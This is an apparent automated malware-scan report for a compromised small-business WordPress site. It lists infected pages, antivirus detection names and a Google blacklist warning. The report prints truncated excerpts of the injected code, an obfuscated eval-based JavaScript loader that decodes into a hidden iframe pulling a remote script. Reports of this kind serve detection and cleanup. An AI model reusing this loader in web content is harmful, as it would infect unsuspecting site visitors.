Malware Scanner report for mobilehoisthire.co.uk

Malicious/Suspicious/Total urls checked: 10/0/15

10 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "mobilehoisthire.co.uk" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mobilehoisthire.co.uk

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.mobilehoisthire.co.uk/	200 OK Content-Length: 17029 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_80_7d_7d_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_80_7d_7d_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_6b_74_77_7d_6c_36_71_7c_37_6f_60_40_4e_55_50_7a_54_36_78_70_78_2f_43_15_12_28_79_80_7d_7d ... 3247 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A Fortinet JS/Iframe.DDG!tr.dldr
http://www.mobilehoisthire.co.uk/wp-includes/js/jquery/jquery.js?ver=1.8.3	200 OK Content-Length: 93658 Content-Type: application/x-javascript	clean
http://www.mobilehoisthire.co.uk/wp-content/plugins/slick-contact-forms/js/jquery.slick.contact.1.3.2.js?ver=3.5.2	200 OK Content-Length: 27553 Content-Type: application/x-javascript	clean
http://www.mobilehoisthire.co.uk/wp-content/themes/mystique/js/jquery.mystique.js?ver=2.4.2	200 OK Content-Length: 56979 Content-Type: application/x-javascript	clean
http://www.mobilehoisthire.co.uk/?mystique=jquery_init&ver=2.4.2	200 OK Content-Length: 3416 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var $lang=new Array(); $lang[0]="Posting. Please wait..."; $lang[1]="Your comment was added."; $lang[2]="Post another comment"; jQuery(document).ready(function ($) { if (isIE6) { jQuery('#page').append("<div class='crap-browser-warning'>You're using a old and buggy browser. Switch to a <a href='http://www.mozilla.com/firefox/'>normal browser</a> or consider <a href='http://www.microsoft.com/windows/internet-explorer ... 2690 bytes are skipped .../> }); setup_comment_controls(); setup_comment_ajax(); jQuery('a.print').click(function() { jQuery('.post.single').printElement({printMode:'popup'}); return false; }); jQuery("#navigation").attr("role", "navigation"); jQuery("#primary-content").attr("role", "main"); jQuery("#sidebar").attr("role", "complementary"); jQuery("#searchform").attr("role", "search"); }); Antivirus reports: AntiVir HTML/ExpKit.Gen3 Ikarus Trojan.Script Comodo TrojWare.JS.Agent.FP Microsoft Trojan:HTML/Redirector.BB Fortinet HTML/ScrInject.B!exploit NANO-Antivirus Trojan.Url.IframeB.bgwnap VIPRE Trojan.JS.Agent.fuj (v) Norman Redir.JI ESET-NOD32 HTML/ScrInject.B.Gen
http://www.mobilehoisthire.co.uk/training/	200 OK Content-Length: 15375 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_80_7d_7d_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_80_7d_7d_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_6b_74_77_7d_6c_36_71_7c_37_6f_60_40_4e_55_50_7a_54_36_78_70_78_2f_43_15_12_28_79_80_7d_7d ... 3247 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A Fortinet JS/Iframe.DDG!tr.dldr
http://www.mobilehoisthire.co.uk/training/?mystique=jquery_init&ver=2.4.2	200 OK Content-Length: 3416 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var $lang=new Array(); $lang[0]="Posting. Please wait..."; $lang[1]="Your comment was added."; $lang[2]="Post another comment"; jQuery(document).ready(function ($) { if (isIE6) { jQuery('#page').append("<div class='crap-browser-warning'>You're using a old and buggy browser. Switch to a <a href='http://www.mozilla.com/firefox/'>normal browser</a> or consider <a href='http://www.microsoft.com/windows/internet-explorer ... 2690 bytes are skipped .../> }); setup_comment_controls(); setup_comment_ajax(); jQuery('a.print').click(function() { jQuery('.post.single').printElement({printMode:'popup'}); return false; }); jQuery("#navigation").attr("role", "navigation"); jQuery("#primary-content").attr("role", "main"); jQuery("#sidebar").attr("role", "complementary"); jQuery("#searchform").attr("role", "search"); }); Antivirus reports: AntiVir HTML/ExpKit.Gen3 Ikarus Trojan.Script Comodo TrojWare.JS.Agent.FP Microsoft Trojan:HTML/Redirector.BB Fortinet HTML/ScrInject.B!exploit NANO-Antivirus Trojan.Url.IframeB.bgwnap VIPRE Trojan.JS.Agent.fuj (v) Norman Redir.JI ESET-NOD32 HTML/ScrInject.B.Gen
http://www.mobilehoisthire.co.uk/tcs/	200 OK Content-Length: 16198 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_80_7d_7d_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_80_7d_7d_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_6b_74_77_7d_6c_36_71_7c_37_6f_60_40_4e_55_50_7a_54_36_78_70_78_2f_43_15_12_28_79_80_7d_7d ... 3247 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A Fortinet JS/Iframe.DDG!tr.dldr
http://www.mobilehoisthire.co.uk/tcs/?mystique=jquery_init&ver=2.4.2	200 OK Content-Length: 3416 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var $lang=new Array(); $lang[0]="Posting. Please wait..."; $lang[1]="Your comment was added."; $lang[2]="Post another comment"; jQuery(document).ready(function ($) { if (isIE6) { jQuery('#page').append("<div class='crap-browser-warning'>You're using a old and buggy browser. Switch to a <a href='http://www.mozilla.com/firefox/'>normal browser</a> or consider <a href='http://www.microsoft.com/windows/internet-explorer ... 2690 bytes are skipped .../> }); setup_comment_controls(); setup_comment_ajax(); jQuery('a.print').click(function() { jQuery('.post.single').printElement({printMode:'popup'}); return false; }); jQuery("#navigation").attr("role", "navigation"); jQuery("#primary-content").attr("role", "main"); jQuery("#sidebar").attr("role", "complementary"); jQuery("#searchform").attr("role", "search"); }); Antivirus reports: AntiVir HTML/ExpKit.Gen3 Ikarus Trojan.Script Comodo TrojWare.JS.Agent.FP Microsoft Trojan:HTML/Redirector.BB Fortinet HTML/ScrInject.B!exploit NANO-Antivirus Trojan.Url.IframeB.bgwnap VIPRE Trojan.JS.Agent.fuj (v) Norman Redir.JI ESET-NOD32 HTML/ScrInject.B.Gen
http://www.mobilehoisthire.co.uk/contact-us/	200 OK Content-Length: 15898 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_80_7d_7d_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_80_7d_7d_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_6b_74_77_7d_6c_36_71_7c_37_6f_60_40_4e_55_50_7a_54_36_78_70_78_2f_43_15_12_28_79_80_7d_7d ... 3247 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A Fortinet JS/Iframe.DDG!tr.dldr
http://www.mobilehoisthire.co.uk/contact-us/?mystique=jquery_init&ver=2.4.2	200 OK Content-Length: 3416 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var $lang=new Array(); $lang[0]="Posting. Please wait..."; $lang[1]="Your comment was added."; $lang[2]="Post another comment"; jQuery(document).ready(function ($) { if (isIE6) { jQuery('#page').append("<div class='crap-browser-warning'>You're using a old and buggy browser. Switch to a <a href='http://www.mozilla.com/firefox/'>normal browser</a> or consider <a href='http://www.microsoft.com/windows/internet-explorer ... 2690 bytes are skipped .../> }); setup_comment_controls(); setup_comment_ajax(); jQuery('a.print').click(function() { jQuery('.post.single').printElement({printMode:'popup'}); return false; }); jQuery("#navigation").attr("role", "navigation"); jQuery("#primary-content").attr("role", "main"); jQuery("#sidebar").attr("role", "complementary"); jQuery("#searchform").attr("role", "search"); }); Antivirus reports: AntiVir HTML/ExpKit.Gen3 Ikarus Trojan.Script Comodo TrojWare.JS.Agent.FP Microsoft Trojan:HTML/Redirector.BB Fortinet HTML/ScrInject.B!exploit NANO-Antivirus Trojan.Url.IframeB.bgwnap VIPRE Trojan.JS.Agent.fuj (v) Norman Redir.JI ESET-NOD32 HTML/ScrInject.B.Gen
http://www.mobilehoisthire.co.uk/test404page.js	404 Not Found Content-Length: 13963 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_80_7d_7d_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_80_7d_7d_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_6b_74_77_7d_6c_36_71_7c_37_6f_60_40_4e_55_50_7a_54_36_78_70_78_2f_43_15_12_28_79_80_7d_7d ... 3247 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Infected.A Fortinet JS/Iframe.DDG!tr.dldr
http://www.mobilehoisthire.co.uk?mystique=jquery_init&ver=2.4.2/	200 OK Content-Length: 3416 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var $lang=new Array(); $lang[0]="Posting. Please wait..."; $lang[1]="Your comment was added."; $lang[2]="Post another comment"; jQuery(document).ready(function ($) { if (isIE6) { jQuery('#page').append("<div class='crap-browser-warning'>You're using a old and buggy browser. Switch to a <a href='http://www.mozilla.com/firefox/'>normal browser</a> or consider <a href='http://www. ...[3229 bytes skipped]... Antivirus reports: AntiVir HTML/ExpKit.Gen3 Ikarus Trojan.Script Comodo TrojWare.JS.Agent.FP Microsoft Trojan:HTML/Redirector.BB Fortinet HTML/ScrInject.B!exploit NANO-Antivirus Trojan.Url.IframeB.bgwnap VIPRE Trojan.JS.Agent.fuj (v) Norman Redir.JI ESET-NOD32 HTML/ScrInject.B.Gen
http://www.mobilehoisthire.co.uk/wp-content/uploads/2011/07/Advance02.jpg	200 OK Content-Length: 300454 Content-Type: image/jpeg	clean
http://www.mobilehoisthire.co.uk/wp-content/uploads/2011/07/Oxford-Journey-004.jpg	200 OK Content-Length: 301914 Content-Type: image/jpeg	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mobilehoisthire.co.uk

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: mobilehoisthire.co.uk
Referer: http://www.google.com/search?q=mobilehoisthire.co.uk

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for mobilehoisthire.co.uk

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools